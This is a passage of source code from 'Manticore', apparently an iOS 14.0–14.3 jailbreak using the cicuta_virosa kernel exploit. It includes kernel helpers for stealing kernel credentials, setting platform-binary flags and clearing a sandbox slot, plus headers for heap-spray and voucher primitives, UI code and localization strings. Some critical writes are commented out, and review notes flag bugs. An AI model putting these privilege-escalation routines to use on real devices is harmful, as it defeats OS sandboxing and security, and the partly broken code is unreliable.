    if([[NSFileManager defaultManager] fileExistsAtPath:@"/var/mobile/.manticore/"] && [[NSFileManager defaultManager] fileExistsAtPath:jailbreakPlistPath]) {
        return YES;
    } else {
        printf("Initial installation of manticore starting...\n");

        // Create /var/mobile/.manticore folder for jailbreak/project specific files
        if(![[NSFileManager defaultManager] fileExistsAtPath:jailbreakDirBasePath]) [[NSFileManager defaultManager] createDirectoryAtPath:jailbreakDirBasePath withIntermediateDirectories:YES attributes:nil error:NULL];
        else return NO; // directory present but plist missing: bails out without creating the plist

        // Create jailbreak.plist
        if(![[NSFileManager defaultManager] fileExistsAtPath:jailbreakPlistPath]) createEmptyPlist(jailbreakPlistPath);
        else return NO;
        return 0; // reached after a successful first-time setup
    }
    return NO; // unreachable: both branches above return
}
109 |
--------------------------------------------------------------------------------
/manticore/Jailbreak/kernel_utils.mm:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_u.m
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #import
9 | #include
10 | #include
11 |
12 | #include "log.hpp"
13 | #include "kernel_utils.h"
14 | #include "utils.h"
15 |
16 | #include
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 |
26 | #include
27 |
28 | #if 1
29 | #define MAX_CHUNK 0xff0
30 | #else
31 | #define MAX_CHUNK 0x2000
32 | #endif
33 |
// Task port handle and r/w counters. None of the three is referenced in the
// visible part of this file; they are presumably set by the kapi_* helpers.
mach_port_t tfp0 = MACH_PORT_NULL;
uint64_t kreads = 0;
uint64_t kwrites = 0;

// Packed mirror of the leading fields of a kernel task structure. Field
// meanings beyond the existing `lock` comment are not verified in this file,
// and the type is not used in the visible code.
typedef struct __attribute__((packed)) {
    struct {
        uint64_t data;
        uint32_t reserved : 24;
        uint32_t type : 8;
        uint32_t pad;
    } lock; // mutex lock
    uint32_t ref_count;
    uint32_t active;
    uint32_t halting;
    uint32_t pad;
    uint64_t map;
} ktask_t;
51 |
/*
 * Compute the task t_flags of `proc` with TF_PLATFORM set or cleared.
 *
 * As committed the write-back (write_32) is commented out, so the function
 * only reads, returns 0 for an invalid proc or task pointer and true
 * otherwise, and changes nothing in the kernel.
 *
 * NOTE(review): 0x10 and 0x3a0 are hard-coded here instead of coming from
 * the OFFSET() tables in KernelOffsets.c, which is a maintenance hazard if
 * this is ever re-enabled.
 */
bool set_platform_binary(kptr_t proc, bool set) {
    bool ret = false;
    if(!KERN_POINTER_VALID(proc)) return 0; // bail on an invalid proc pointer (the guard rejects invalid pointers; it does not require one)
    kptr_t task_struct_addr = read_64(proc + 0x10);
    if(!KERN_POINTER_VALID(task_struct_addr)) return 0;
    kptr_t task_t_flags_addr = task_struct_addr + 0x3a0;
    uint32_t task_t_flags = read_32(task_t_flags_addr);
    if (set) {
        task_t_flags |= TF_PLATFORM;
    } else {
        task_t_flags &= ~(TF_PLATFORM);
    }
    // write_32((task_struct_addr + 0x3a0), (void*)task_t_flags);
    ret = true;
    return ret;
}
68 |
/*
 * Intended to swap the credentials of `proc` for `creds` and return the
 * previous credential pointer so the caller can restore them. As committed
 * the swap itself (the kapi_write64 near the end) is commented out, so
 * outside debug mode this only reads and returns the current p_ucred.
 *
 * Returns old_creds, or (kptr_t)NULL after a warning if the read value fails
 * KERN_POINTER_INVALID. MANTICORE_THROW_ON_FALSE is a project macro whose
 * failure behaviour is not visible here.
 *
 * NOTE(review), debug branch: `stolen_cred` is declared but never filled,
 * yet it is written to kernel memory at cred_posix — uninitialised stack
 * data going into a live credential structure (panic/corruption risk).
 * cred_label is malloc'd and never freed, and the size check exit(0)s the
 * whole process. The author's TODO below marks the branch as unfinished.
 */
kptr_t give_creds_to_proc_at_addr(kptr_t proc, kptr_t creds) {
    // should never receive invalid values
    MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(proc));
    MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(creds));

    auto our_creds = proc + OFFSET(proc, p_ucred); // address of the proc's p_ucred field
    auto old_creds = kapi_read_kptr(our_creds); // current credential pointer, returned for restoration

    if (KERN_POINTER_INVALID(old_creds)) {
        manticore_warn("[give_creds_to_proc_at_addr] old_creds invalid value: %#0llx", old_creds);
        return (kptr_t)NULL;
    } else manticore_info("[give_creds_to_proc_at_addr] old_creds stored at %#0llx", old_creds);

    if(g_exp.debug){
        printf("---> Trying to steal creds @0x%llx's...\n", proc);
        kptr_t cred_posix = creds + OFFSET(ucred, cr_posix);
        size_t cred_posix_size = SIZE(posix_cred);
        char stolen_cred[cred_posix_size]; // never initialised (see NOTE above)
        struct proc_cred *cred_label;

        if(cred_posix_size > sizeof(cred_label->posix_cred)){
            printf("Error:\tstruct proc_cred should be bigger.");
            exit(0);
        }

        cred_label = (struct proc_cred *)malloc(sizeof(*cred_label)); // not freed
        kapi_read(cred_posix, cred_label->posix_cred, cred_posix_size);
        cred_label->cr_label = kapi_read64(cred_posix + SIZE(posix_cred));
        cred_label->sandbox_slot = 0;

        if(cred_label->cr_label) {
            kptr_t cr_label = cred_label->cr_label | 0xffffff8000000000;
            cred_label->sandbox_slot = kapi_read64(cr_label + 0x10);
            kapi_write64(cr_label + 0x10, 0x0);
        }

        // TODO: fix this function by translating it from proc_set_root_cred

        kapi_write(cred_posix, stolen_cred, cred_posix_size); // writes the uninitialised buffer
        printf("---> Done\n");
    }

    // kapi_write64(our_creds, creds); // update creds

    return old_creds;
}
115 |
/*
 * Run `function` while `proc` carries `creds`, then restore the previous
 * credentials.
 *
 * Both steps go through give_creds_to_proc_at_addr(); the return value is
 * whether the restoring call returned a non-null pointer. Returns false
 * after a warning if the first call yields an invalid old_creds. Note that
 * give_creds_to_proc_at_addr() currently has its write-back commented out,
 * so `function` runs with the process's existing credentials.
 */
bool execute_with_credentials(kptr_t proc, kptr_t creds, void (^function)(void)) {
    MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(proc));
    MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(creds));
    MANTICORE_THROW_ON_NULL(function);

    auto old_creds = give_creds_to_proc_at_addr(proc, creds);

    if (KERN_POINTER_INVALID(old_creds)) {
        manticore_warn("[execute_with_credentials] old_creds invalid value: %#0llx", old_creds);
        return false;
    }

    function();

    return (bool)give_creds_to_proc_at_addr(proc, old_creds); // true iff restoration returned a pointer
}
132 |
/*
 * Read the p_ucred pointer of the kernel proc (g_exp.kernel_proc).
 * Returns it, or (kptr_t)NULL after a warning if the value fails
 * KERN_POINTER_INVALID. Throws via MANTICORE_THROW_ON_FALSE if
 * g_exp.kernel_proc itself is invalid.
 */
kptr_t get_kernel_cred_addr(){
    MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(g_exp.kernel_proc));
    auto k_ucred = kapi_read_kptr(g_exp.kernel_proc + OFFSET(proc, p_ucred));

    if (KERN_POINTER_INVALID(k_ucred)) {
        manticore_warn("[get_kernel_cred_addr] k_ucred invalid value: %#0llx", k_ucred);
        return (kptr_t)NULL;
    } else manticore_info("[get_kernel_cred_addr] kernel credits found @ 0x%llx", k_ucred);

    return k_ucred;
}
144 |
/*
 * Run `function` via execute_with_credentials() using the kernel proc's
 * credentials for g_exp.self_proc. Returns true on success, false (with a
 * warning) if the kernel cred pointer is invalid or the call fails.
 *
 * Before that it hex-dumps 40 bytes of the current process's credential
 * pointer area and of the kernel cred with util_hexprint() — debug output.
 *
 * NOTE(review): kapi_read(k_cred, ...) runs before k_cred is validated; if
 * get_kernel_cred_addr() returned NULL this reads through an invalid pointer.
 */
bool execute_with_kernel_credentials(void (^function)(void)){
    auto k_cred = get_kernel_cred_addr();

    uint32_t data[10] = {};
    kapi_read(g_exp.self_proc + OFFSET(proc, p_ucred), data, sizeof(data));
    util_hexprint(data, sizeof(data), "owncreds");

    printf("\n\n");

    uint32_t data2[10] = {};
    kapi_read(k_cred, data2, sizeof(data2)); // executed before the validity check below
    util_hexprint(data2, sizeof(data2), "kerncreds");

    if (KERN_POINTER_INVALID(k_cred)) {
        manticore_warn("[execute_with_kernel_credentials] k_cred invalid value: %#0llx", k_cred);
        return false;
    }

    if (!execute_with_credentials(g_exp.self_proc, k_cred, function)) {
        manticore_warn("[execute_with_kernel_credentials] failed to execute as kernel :(");
        return false;
    } else manticore_info("[execute_with_kernel_credentials] successfully executed as kernel :)");

    return true;
}
170 |
171 |
172 |
/*
 * Stub: always returns 0. The commented-out body sketches a walk of the
 * process list starting at find_allproc(); `pid` is currently unused.
 */
uint64_t proc_of_pid(pid_t pid) {
    // uint64_t proc = read_64(find_allproc()), pd;
    // while (proc) { //iterate over all processes till we find the one we're looking for
    // pd = read_32(proc + koffset(KSTRUCT_OFFSET_PROC_PID));
    // if (pd == pid) return proc;
    // proc = read_64(proc);
    // }
    return 0;
}
182 |
/*
 * Follow proc -> filedesc -> fd_ofiles[fd] -> fileglob -> fg_data and return
 * the final pointer (the vnode for a file-backed descriptor).
 *
 * Error reporting: each failed step returns a small integer 1..6 typed as
 * kptr_t rather than KPTR_NULL. Callers that test with KERN_POINTER_VALID()
 * will treat these as failures; callers that compare against KPTR_NULL will
 * not. fd 0 is rejected together with negative descriptors.
 *
 * NOTE(review): the offsets are hard-coded here instead of taken from the
 * OFFSET() tables in KernelOffsets.c (same maintenance hazard as in
 * set_platform_binary()).
 */
kptr_t find_vnode_with_fd(kptr_t proc, int fd) {
    kptr_t ret = KPTR_NULL;
    if(fd <= 0 || !KERN_POINTER_VALID(proc)) return 1;
    kptr_t fdp = read_64(proc + 0xf8);
    if(!KERN_POINTER_VALID(fdp)) return 2;
    kptr_t ofp = read_64(fdp + 0x0);
    if(!KERN_POINTER_VALID(ofp)) return 3;
    kptr_t fpp = read_64(ofp + (fd * sizeof(kptr_t)));
    if(!KERN_POINTER_VALID(fpp)) return 4;
    kptr_t fgp = read_64(fpp + 0x10);
    if(!KERN_POINTER_VALID(fgp)) return 5;
    kptr_t vnode = read_64(fgp + 0x38);
    if(!KERN_POINTER_VALID(vnode)) return 6;
    ret = vnode;
    return ret;
}
199 |
/*
 * Starting at g_exp.kernel_proc, follow le_next until the next pointer is
 * invalid and return the last valid proc reached.
 *
 * NOTE(review): whether that element is the allproc list head depends on the
 * list layout, which is not established in this file — confirm against the
 * caller's expectation. The loop terminates as soon as le_next is invalid.
 */
kptr_t find_allproc(){
    kptr_t current_proc = g_exp.kernel_proc;
    while(true){
        kptr_t next_proc = kapi_read_kptr(current_proc + OFFSET(proc, le_next));
        if(KERN_POINTER_VALID(next_proc)) current_proc = next_proc;
        if(KERN_POINTER_INVALID(next_proc)) break;
    }

    return current_proc;
}
210 |
--------------------------------------------------------------------------------
/manticore/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 | #import
// Returns a strdup'd path inside the main bundle's resource directory; the caller frees it.
char *Build_resource_path(char *filename);

// Main screen: jailbreak/options buttons, a log text view and a compatibility label.
@interface ViewController : UIViewController
@property (weak, nonatomic) IBOutlet UIButton *jailbreakButton;
@property (weak, nonatomic) IBOutlet UIButton *optionsButton;
@property (weak, nonatomic) IBOutlet UITextView *logWindow;
- (IBAction)runJailbreak:(id)sender;
- (IBAction)openOptions:(id)sender;
- (IBAction)setApNonceBtn:(id)sender;
- (void)sendMessageToLog:(NSString *)Message;   // appends a line to logWindow (implementation not visible here)
// Plain C function declared inside the @interface; it is not a method. Defined in ViewController.m.
bool checkDeviceCompatibility(void);
@property (weak, nonatomic) IBOutlet UIProgressView *progressView;
@property (weak, nonatomic) IBOutlet UILabel *compatibilityLabel;

@end
23 |
24 |
--------------------------------------------------------------------------------
/manticore/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // reton
4 | //
5 | // Created by GeoSn0w on 24.08.21.
6 | //
7 |
8 | #import "ViewController.h"
9 | #include // cicuta_virosa exploit [14.0 --> 14.3]
10 | #include
11 | #include
12 | #include
13 |
14 | #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)
15 | #define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)
16 | #define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)
17 | #define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)
18 | #define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)
19 |
// Global nonce string; not referenced in the visible part of this file (presumably set by setApNonceBtn:).
NSString *APNonce = NULL;
21 |
// Empty class extension; private properties or methods would be declared here.
@interface ViewController ()

@end
25 |
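@implementation ViewController

// Defined further down, after the methods that call it; declared here so the
// call in viewDidAppear: does not depend on an implicit function declaration.
void handleExistingJailbreak(id selfless);

/// Whether the running iOS version lies inside the range the bundled exploit
/// supports: 14.0 <= version <= 14.3. The decision is also written to NSLog.
bool checkDeviceCompatibility(void){
    // Both bounds are checked on purpose: an upper bound alone would still accept
    // later 14.x builds such as 14.7.1. The macros compare numerically, so
    // "14.10" is correctly treated as newer than "14.3".
    if (SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(@"14.3") && SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"14.0")){
        NSLog(@"[+] Found compatible device, continuing...");
        return true;
    }
    NSLog(@"[!] Incompatible device detected. Will not continue.");
    return false;
}

/// Build an absolute path below the app bundle's resource directory.
/// @param filename  name relative to the resource directory, or NULL to get the
///                  directory itself (with a trailing "/").
/// @return a malloc'd C string that the caller must free(); NULL when filename is
///         not valid UTF-8 (previously this case raised NSInvalidArgumentException
///         from stringByAppendingPathComponent:nil).
char *Build_resource_path(char *filename){
    NSString *resourcePath = [[NSBundle mainBundle] resourcePath];
    if(filename == NULL) {
        return strdup([[resourcePath stringByAppendingString:@"/"] UTF8String]);
    }
    NSString *component = [NSString stringWithUTF8String:filename];
    if (component == nil) {
        // stringWithUTF8String: returns nil for malformed input; report that to
        // the caller instead of letting Foundation throw.
        return NULL;
    }
    return strdup([[resourcePath stringByAppendingPathComponent:component] UTF8String]);
}

- (void)viewDidLoad {
    [super viewDidLoad];
    [_jailbreakButton.layer setBorderColor:[UIColor systemGray2Color].CGColor];
    NSString *programVersion = [[NSBundle mainBundle] objectForInfoDictionaryKey:@"CFBundleVersion"];

    UIDevice *device = [UIDevice currentDevice];
    if (checkDeviceCompatibility()) {
        _compatibilityLabel.text = [NSString stringWithFormat:@"Your %@ on iOS %@ is compatible with manticore!", device.model, device.systemVersion];
    } else {
        _compatibilityLabel.text = [NSString stringWithFormat:@"Your %@ on iOS %@ is NOT compatible with Manticore.", device.model, device.systemVersion];
        // The version check is the only gate in this file; disabling the button is
        // what actually prevents exploit_main() from being started on an
        // unsupported build.
        self.jailbreakButton.enabled = NO;
        [_jailbreakButton setTitle:@"Incompatible" forState:UIControlStateDisabled];
    }

    [self sendMessageToLog:[NSString stringWithFormat:@"Press 'Jailbreak Me' to start (Manticore %@)", programVersion]];
    [self sendMessageToLog:@"@RPwnage && PwnedC99"];
}

- (void)viewDidAppear:(BOOL)animated {
    [super viewDidAppear:animated];
    // The existing-jailbreak alert used to be presented from viewDidLoad, where the
    // view is not yet in a window and UIKit refuses to present. Present it once the
    // view is on screen, and only once per process so re-appearing (e.g. after the
    // options screen is dismissed) does not repeat it.
    static BOOL warnedAboutExistingJailbreak = NO;
    if (!warnedAboutExistingJailbreak) {
        warnedAboutExistingJailbreak = YES;
        handleExistingJailbreak(self);
    }
}

// Unwind segue target for the options screen; intentionally empty.
- (IBAction)done:(UIStoryboardSegue *)segue {
}

- (IBAction)runJailbreak:(id)sender {
    // Clear the log before writing to it. The original logged "[*] Starting...."
    // and wiped the text view on the next line, so the message was never visible.
    self.logWindow.text = @"";
    [self sendMessageToLog:@"[*] Starting...."];
    // Prevent a second tap while a run is in progress.
    self.jailbreakButton.enabled = NO;

    // Hand exploit_main() to the main queue after the current event finishes. The
    // original wrapped a dispatch_sync onto the main queue inside a background
    // dispatch_async, which has the same net effect: the exploit runs on the main
    // thread and the UI does not repaint until it returns. Whether exploit_main()
    // really needs the main thread is not visible from this file — keep it there
    // until that is confirmed.
    dispatch_async(dispatch_get_main_queue(), ^{
        exploit_main();
    });
}

/// Append Message plus a trailing newline to the log text view.
/// UITextView may only be touched from the main thread, so calls arriving on any
/// other thread are forwarded asynchronously to the main queue.
- (void)sendMessageToLog:(NSString *)Message {
    NSString *line = [NSString stringWithFormat:@"%@\n", Message];
    if (![NSThread isMainThread]) {
        dispatch_async(dispatch_get_main_queue(), ^{
            [self.logWindow insertText:line];
        });
        return;
    }
    [self.logWindow insertText:line];
}

// Name of a jailbreak detected on the device, or NULL when none was detected.
// Nothing in this file assigns it; presumably the detection code elsewhere does.
char *anotherJailbreakMessage;

/// Present a blocking warning when another jailbreak was detected.
/// @param selfless  the view controller to present the alert from (typed id so the
///                  plain C caller does not need the class declaration).
/// Does nothing when anotherJailbreakMessage is NULL — the original presented the
/// alert unconditionally with "(null)" as the name, and with no action so it could
/// never be dismissed.
void handleExistingJailbreak(id selfless) {
    if (anotherJailbreakMessage == NULL) {
        return;
    }
    NSString *jailbreakName = [NSString stringWithUTF8String:anotherJailbreakMessage];
    NSString *messageForUser = [NSString stringWithFormat:@"We've detected you have %@ already installed. Please uninstall it first, and restore ROOT FS before jailbreaking with Manticore to prevent any compatibility issues.", jailbreakName];

    UIAlertController *existingJailbreakAlert = [UIAlertController alertControllerWithTitle:@"Critical Error" message:messageForUser preferredStyle:UIAlertControllerStyleAlert];
    // Without at least one action the alert has no way to be dismissed.
    [existingJailbreakAlert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];

    [selfless presentViewController:existingJailbreakAlert animated:YES completion:nil];
}

// Options button handler; the options screen is presented by the storyboard
// segue, so there is nothing to do here.
- (IBAction)openOptions:(id)sender {

}

@end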
105 |
--------------------------------------------------------------------------------
/manticore/de.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/de.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
3 | "0yi-4F-L8u.text" = "APNonce Setzen";
4 |
5 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
6 | "2Nf-dY-FJy.text" = "Tweaks Erlauben";
7 |
8 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
9 | "8Oy-13-2xy.text" = "Bildschirmzeit Deaktivieren";
10 |
11 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
12 | "8lS-uL-LxK.text" = "Package Management";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "RootFS Wiederherstellen";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "Jailbreak";
19 |
20 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
21 | "GyA-VR-ZRI.text" = "Log Window Zeigen";
22 |
23 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
24 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
25 |
26 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
27 | "K4g-i5-DXs.text" = "Updates Blockieren";
28 |
29 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
30 | "KVP-vA-4W2.text" = "Einstellungen";
31 |
32 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
33 | "WEh-zy-xS5.normalTitle" = "APNonce Speichern & Setzen";
34 |
35 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
36 | "bFz-pN-VmJ.text" = "RootFS Wiederherstellen";
37 |
38 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
39 | "czz-vo-cHF.normalTitle" = "Einstellungen";
40 |
41 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
42 | "efL-nQ-xsh.text" = "OTA Updates Blockieren";
43 |
44 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
45 | "hav-yD-P83.text" = "Max Memory Limit";
46 |
47 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
48 | "i1H-yX-3n8.text" = "Kompatibilität";
49 |
50 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
51 | "kFD-2g-aOl.text" = "Daemons Laden";
52 |
53 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
54 | "kyq-MK-M3C.text" = "Bildschirmzeit Deaktivieren";
55 |
56 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
57 | "mUJ-nK-XHv.text" = "Manticore";
58 |
59 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
60 | "ntj-8w-lbe.text" = "Tweaks Laden";
61 |
62 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
63 | "o5h-H3-igh.text" = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!";
64 |
65 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
66 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
67 |
68 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
69 | "voS-Ev-D3K.text" = "Log ECID";
70 |
71 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
72 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
73 |
74 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
75 | "yiE-wg-tPU.text" = "Toggle Log Window";
76 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/cicuta_log.h:
--------------------------------------------------------------------------------
#pragma once
#include

// printf-style logger for the exploit; __printflike(1, 2) makes the compiler
// check the format string (argument 1) against the variadic arguments.
void cicuta_log(const char* format, ...) __printflike(1, 2);
5 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/cicuta_virosa.h:
--------------------------------------------------------------------------------
#pragma once
#include

// CoreFoundation version number used as the iOS 14.0 floor; the value is not
// verified anywhere in this header.
#define kCFCoreFoundationVersionNumber_iOS_14_0 1740.00

#ifdef __cplusplus
extern "C" {
#endif

// Thread handles owned by the exploit; defined in cicuta_virosa.c.
extern pthread_t* redeem_racers;
void cicuta_virosa(void);
// Kernel memory accessors. NOTE(review): the numeric suffix is not used
// consistently — read_64/read_32 return a value of that bit width, while
// read_20/write_20/write_32/write_64 copy through a buffer and write_32bits
// exists separately from write_32. Confirm each size against cicuta_virosa.c
// before relying on a name.
uint64_t read_64(uint64_t addr);
uint32_t read_32(uint64_t addr);
void read_20(uint64_t addr, void *buf);
void write_20(uint64_t addr, const void* buf);
void write_32(uint64_t addr, const void* buf);
void write_32bits(uint64_t addr, const void* buf);
void write_64(uint64_t addr, const void* buf);
extern uint64_t task_port_pwnd;
void build_stage0_kmem_api(void);

#ifdef __cplusplus
}
#endif
25 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/descriptors_utils.h:
--------------------------------------------------------------------------------
#pragma once
#include

// Raise the process descriptor limit to `limit`; defined in descriptors_utils.c.
// No error is reported through the signature, so failure is presumably logged
// there — confirm.
void increase_limits(uint32_t limit);
5 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/exploit_main.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_main.h
3 | // manticore
4 | //
5 | // Created by Luca on 25.02.21.
6 | //
7 |
#ifndef exploit_main_h
#define exploit_main_h

#include

// Also typedef'd (identically) in k_offsets.h, k_utils.h and tq_common_p.h;
// identical redefinition is accepted by C11 and C++ but is an error under C99.
typedef uint64_t kptr_t;

uint32_t iosurface_create_fast(void);
// NOTE(review): these are `static` in a header, so every translation unit that
// includes it gets its own private copy of pipefds, pipe_buffer and
// IOSurfaceRoot_uc. A value assigned in one .c file is not visible in another;
// if the state is meant to be shared they should be `extern` here and defined
// once in a .c file.
static int *pipefds;
static size_t pipe_buffer_size = 0x1000;
static uint8_t *pipe_buffer;
static kptr_t IOSurfaceRoot_uc;
// Entry point invoked from ViewController's runJailbreak: handler.
void exploit_main(void);

#endif /* exploit_main_h */
23 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/exploit_utilities.h:
--------------------------------------------------------------------------------
#pragma once
#include

// Mach message carrying one out-of-line ports descriptor.
struct ool_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool_ports;
};

// Header followed by an inline payload. `buf[0]` is a zero-length array (GNU
// extension); the C99 flexible array member `char buf[];` expresses the same
// layout portably.
struct simple_msg {
    mach_msg_header_t hdr;
    char buf[0];
};

// Header variant whose remote/local port fields are 64 bits wide instead of
// mach_port_t; the kern_ prefix suggests it mirrors the in-kernel layout —
// confirm against the code that fills it.
typedef struct {
    mach_msg_bits_t msgh_bits;
    mach_msg_size_t msgh_size;
    uint64_t msgh_remote_port;
    uint64_t msgh_local_port;
    mach_port_name_t msgh_voucher_port;
    mach_msg_id_t msgh_id;
} kern_mach_msg_header_t;

// mach_msg related utils
#ifdef __cplusplus
extern "C" {
#endif

mach_port_t cv_new_mach_port(void);
mach_port_t new_mach_port(void);
kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size);
// Returns a pointer to a received message; who frees it is not stated here —
// check receive_message's definition before calling it in a loop.
struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size);
int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition);
int cv_send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition);

#ifdef __cplusplus
}
#endif
39 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/fake_element_spray.h:
--------------------------------------------------------------------------------
#pragma once
#include
#include
#include
#include
#include
#include

#define FAKE_ELEMENT_MAGIC_BASE 0x4242424200000000
// Socket option numbers; identical to the values in Darwin's <netinet/in.h>, so
// an identical redefinition is silently accepted — but they would be wrong
// without warning if the system header's values ever changed.
#define IPV6_USE_MIN_MTU 42
#define IPV6_PKTINFO 46

// Lifecycle: init_* once, then perform/release/shutdown. The setters change
// parameters used by subsequent perform_fake_element_spray() calls.
void init_fake_element_spray(uint32_t e_size, uint32_t count);
void fake_element_spray_set_e_size(uint32_t e_size);
void fake_element_spray_set_pktopts(uint64_t pktopts);
void perform_fake_element_spray(void);
void release_all_fake_element_spray(void);
// No bounds are visible in the signature; presumably index < the `count` given
// to init_fake_element_spray — confirm the check exists in the .c file.
void release_fake_element_spray_at(uint32_t index);
void shutdown_fake_element_spray(void);
void set_fake_queue_chain_for_fake_element_spray(uint64_t next, uint64_t prev);
21 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/voucher_utils.h:
--------------------------------------------------------------------------------
#pragma once
#include
#define USER_DATA_ELEMENT_SIZEOF 32
// 168 - 32 = 136 bytes of user-data payload per voucher.
#define DATA_VOUCHER_CONTENT_SIZE (168 - USER_DATA_ELEMENT_SIZEOF)

kern_return_t create_voucher(mach_voucher_attr_recipe_t recipe, ipc_voucher_t* voucher);
kern_return_t create_user_data_voucher_fast(uint64_t id, ipc_voucher_t* voucher);
// Returns a heap recipe; ownership (who frees it) is not stated here — confirm
// in voucher_utils.c.
mach_voucher_attr_recipe_data_t* create_recipe_for_user_data_voucher(uint64_t id);
kern_return_t destroy_voucher(ipc_voucher_t voucher);
10 |
--------------------------------------------------------------------------------
/manticore/include/lib/snappy/IOKit.h:
--------------------------------------------------------------------------------
1 | // fuck iokit
2 |
#ifndef IOKIT_H
#define IOKIT_H

#include
#include
#include

// Local re-declarations of the IOKit user-space types so the framework header
// is not needed.
typedef char io_name_t[128];
typedef char io_string_t[512];
typedef char io_struct_inband_t[4096];
typedef mach_port_t io_object_t;
